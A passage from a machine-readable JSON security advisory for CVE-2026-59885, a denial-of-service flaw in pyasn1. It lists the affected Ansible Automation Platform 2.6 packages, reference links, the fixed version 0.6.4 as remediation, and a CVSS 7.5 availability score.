"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59885"
},
{
"category": "external",
"summary": "RHBZ#2500380",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500380"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59885",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59885"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59885",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59885"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/45bdb19eb7df4b3780fe9c912c63e99bffc39dd9",
"url": "https://github.com/pyasn1/pyasn1/commit/45bdb19eb7df4b3780fe9c912c63e99bffc39dd9"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-8ppf-4f7h-5ppj",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-8ppf-4f7h-5ppj"
}
],
"release_date": "2026-07-14T16:40:00.515000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Update to pyasn1 version 0.6.4 or later when available for your product stream. The impact is limited to availability (denial of service) \u2014 an attacker cannot access or modify data. Applications that do not process untrusted ASN.1 input are at reduced risk.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
